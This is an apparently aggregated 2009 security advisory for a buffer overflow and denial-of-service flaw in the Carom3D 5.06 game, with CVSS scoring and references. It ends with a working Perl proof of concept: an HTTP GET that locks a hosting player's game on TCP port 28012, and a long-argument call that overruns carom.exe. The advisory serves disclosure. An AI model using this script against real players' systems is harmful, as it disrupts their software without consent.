CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:M/Au:S/C:N/I:N/A:P
AI Score
Confidence
High
EPSS
Percentile
89.5%
Title: Carom3D 5.06 Unicode Buffer Overrun/DoS Vulnerability
Advisory ID: ZSL-2009-4916
Type: Local/Remote
Impact: System Access, DoS
Risk: (2/5)
Release Date: 16.06.2009
Carom 3D is an online multi-user billiard game created with special 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8 ball and other Billiard games to life.
The world famous korean game Carom3D suffers from a buffer overflow and a denial of service vulnerability. The BoF is triggered at runtime when we append 218 > bytes as an argument. ~1000 bytes overwrites SEH. The denial of service is triggered when a user creates a LAN Game (cred. needed), creates a room and awaits other players to join the game. While awaiting (listening on TCP port 28012), with a simple HTTP GET/POST, an attacker can lockdown the GUI of the user created the room, not alowing to start or even exit the game’s GUI, unless forced quit (X).
Neoact Co. Ltd. - <http://www.carom3d.com>
5.06
Microsoft Windows XP Professional SP3 (English)
N/A
Vulnerability discovered by Gjoko Krstic - <[email protected]>
[1] <http://www.milw0rm.com/exploits/8971>
[2] <http://packetstormsecurity.org/filedesc/carom3d-dos.txt.html>
[3] <http://securityreason.com/exploitalert/6430>
[4] <http://sebug.net/exploit/11631/>
[5] <https://vulners.com/cve/CVE-2009-2173>
[6] <http://xforce.iss.net/xforce/xfdb/51219>
[7] <http://securityreason.com/securityalert/5950>
[16.06.2009] - Initial release
[25.06.2009] - Added reference [7]
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>#!/usr/bin/perl
#
# Title: Carom3D 5.06 Unicode Buffer Overrun/Denial Of Service Vulnerability
#
#
# Summary: Carom 3D is an online multi-user billiard game created with special
# 3D graphic effects bringing every aspect such as 6 ball, 9 ball, 8
# ball and other Billiard games to life.
#
# Product Web Page: http://www.carom3d.com/
#
# Description: The world famous korean game Carom3D suffers from a buffer overflow
# and a denial of service vulnerability. The BoF is triggered at
# runtime when we append 218 > bytes as an argument. ~1000 bytes
# overwrites SEH. The denial of service is triggered when a user
# creates a LAN Game (cred. needed), creates a room and awaits
# other players to join the game. While awaiting (listening on port
# 28012), with a simple HTTP GET/POST, an attacker can lockdown
# the GUI of the user created the room, not alowing to start or
# even exit the game's GUI, unless forced quit (X).
#
# Tested On: Microsoft Windows XP Professional SP3 (English)
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# http://www.zeroscience.org/
#
# 15.06.2009
#
# ----------------------------------DoS---------------------------------- #
use LWP::Simple;
my $url = 'http://192.168.1.3:28012';
my $lockdown = get $url;
die "Couldn't get $url" unless defined $lockdown;
# You can Ctrl+C, the lockdown is ON.
# ---------------------------------/DoS---------------------------------- #
###########################################################################
# ----------------------------------BoF---------------------------------- #
# Added 217 bytes as argument = runs normally.
# Added 218 bytes as argument triggers the MS VC++ Runtime Library
# 'Buffer Overrun' error msg box informing us that the program's
# internal state is corrupted.
system('C:\\Progra~1\\Neoact\\Carom3D\\carom.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
# ---------------------------------/BoF---------------------------------- #</p></body></html>